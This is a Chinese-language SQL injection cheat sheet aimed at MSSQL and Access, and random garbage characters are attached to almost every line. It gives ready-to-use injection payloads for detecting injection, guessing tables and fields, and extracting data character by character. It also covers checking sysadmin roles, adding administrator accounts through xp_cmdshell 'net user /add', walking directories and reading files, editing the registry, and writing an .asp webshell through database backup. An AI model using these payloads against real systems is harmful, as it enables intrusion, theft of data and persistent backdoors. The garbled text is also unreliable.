1.判断是否有注入;and 1=1 ;and 1=2 +[i�r7?Y.�
2.初步判断是否是mssql ;and user>0 ?�AxB0d9z
�9��'|k@i:
3.注入参数是字符'and [查询条件] and ''=' oGe��V�!hD
��rB(�Q)N�
4.搜索时没过滤参数的'and [查询条件] and '%25'=' ,�:�-�^O�#
}>�,%El��/
5.判断数据库系统 u0?�TM�y.%
J����z&d�C
;and (select count(*) from sysobjects)>0 mssql �0%\fm W j
��}��4�c$_
;and (select count(*) from msysobjects)>0 access Q-G8Fo%#,E
�~�tW�<]l7
�3_�
E}XQd
Y�a<KMB�i3
6.猜数据库 ;and (select Count(*) from [数据库名])>0 q]!FFi{�w;
&Dt�I+�)[|
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 TOP,]N/F
H
�d�R,a0+!
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 g?��j^d:�
"<�&o�;x<
9.(1)猜字段的ascii值(access) #�sv}%oV,F
�"�J�}B
lB
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 m\
qR �myO
u�0[�O /G�
(2)猜字段的ascii值(mssql) j[$+DCO#|m
,@N�.v?p>�
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �ojj
����T
dKc�hQsgCg
10.测试权限结构(mssql) T# tFzb�r�
/d�}5�R@Oy
�hO�Ig�7=v
Rdd�9JJsVd
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- \�b)�P4a�L
q�9^.�f9�-
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- �l9y��%@7�
:G^4/A�_�
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));--
~xPe�tkl@
Qd�?S~3XT�
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- y^{�4}^u-^
�\j
w�e���
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- 5(�Q�-�||J
@��J�P6F[d
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- #=m:>�Q?%z
RdpOj �>fT
;and 1=(select IS_MEMBER('db_owner'));-- �NL�geBL�B
`q�\v~FT�
l�Y�[1P�|]
j��6 _�w2�
11.添加mssql和系统的帐户 ]8cD,�NS��
� 1�&=2�"�
;exec master.dbo.sp_addlogin username;-- rX`fjS*C��
;exec master.dbo.sp_password null,username,password;-- P=9�sP:[f6
�F*:H&�,��
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- �9�/#b1NGv
geqx":gpx9
;exec master.dbo.xp_cmdshell 'net user username password \IR��$~���
fv>J�n�`��
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- zrtbk�~v8y
j_zy"8�Y{�
;exec master.dbo.xp_cmdshell 'net user username password /add';-- t3Iij0b��~
dW�^#}kN7V
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- RD:LNl<0sh
= j
l(�Q�
'@�QK�<!%,
f�,-'e�W/j
12.(1)遍历目录 cZt5;"xgr]
^#��7�&R�"
;create table dirs(paths varchar(100), id int) q|
*nd!�y'
]z�vOM�^l~
;insert dirs exec master.dbo.xp_dirtree 'c:\' xk���ae�d�
7tY~8gQe�l
;and (select top 1 paths from dirs)>0 L#_QrR6Sny
<%�`z�:G�3
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) P[�Vf$� q<
�`�-r�tU�
H[r6�4~Sth
:{xu_�"nYr
(2)遍历目录 1<�M�~���#
�]��b^bc2:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- ��%NL7XU[~
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 P\
2Bx �*e
V��F"�c}��
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 #��Pq6q.UB
<|�a9�r: [
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 2�l8z/o�7v
-]Oi/i,�{�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 w�S:`��c
J
�F2�=#\U$
J�\I`�#��
8O*O��5���
13.mssql中的存储过程 6lx��Z�o_�
Fi+��,omB&
xp_regenumvalues 注册表根键, 子键 �E�{�}eYU�
� ��qJj5�_
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 �g aXF3v*j
p*H�f<��)}
xp_regread 根键,子键,键值名 �+$G�P(Uu,
%vrUk�;<35
;exec xp_regread m���aQOU1�
T!5g:;~y >
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 .�l�p�pT)P
^F/H?V/�PX
xp_regwrite 根键,子键, 值名, 值类型, 值 ]G=^7O]`C!
A^�ry|4`3(
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 �VDv>I� 2%
tp�KQ$)�ed
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 <UJ5n) }"\
G9>
0w)�r�
xp_regdeletevalue 根键,子键,值名 `�X�bV*�{7
O@K�Ah5EB�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 A Rj�o��x`
IA�bH_+7�O
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 ����sVIw'W
\O�F"��hPq
&R}2���/Mt
�/vF�d��hh
14.mssql的backup创建webshell `ve5>aw0_Y
k�5�GJrK+
use model eN
I6�V/\`
�xTdh��/}
create table cmd(str image); Z�Ck��w��K
HBgt!D�0MZ
insert into cmd(str) values (''); Mq�swYK-s
Y<`�u�q�'V
backup database model to disk='c:\l.asp'; Ob7F3�9):N
7Z��pU -':
e����p�\a�
c<�g{�&YJ
15.mssql内置函数 j}�DG �+M
�p4�wXsOQ}
;and (select @@version)>0 获得Windows的版本号 �q^k�OyA�.
A��j�2yA�g
;and user_name()='dbo' 判断当前系统的连接用户是不是sa �k��m!jxs�
�<U�O'&?G�
;and (select user_name())>0 爆当前系统的连接用户 +Tp>3Jh��2
;jpsH?3�g�
;and (select db_name())>0 得到当前连接的数据库 �.AHw��w7
c
]&|.~2�&
c5tCw�3$�t
�[�,p[%Dza
16.简洁的webshell {= l�9{K`~
�0�9rbu\�h
use model C+c;U�z�bD
t[�^��68]�
create table cmd(str image); �W�-�@}q}A
l8Z��z�Kb-
insert into cmd(str) values (''); �G�cu?x�G{
�1'[�_J���
backup database model to disk='g:\wwwtest\l.asp';
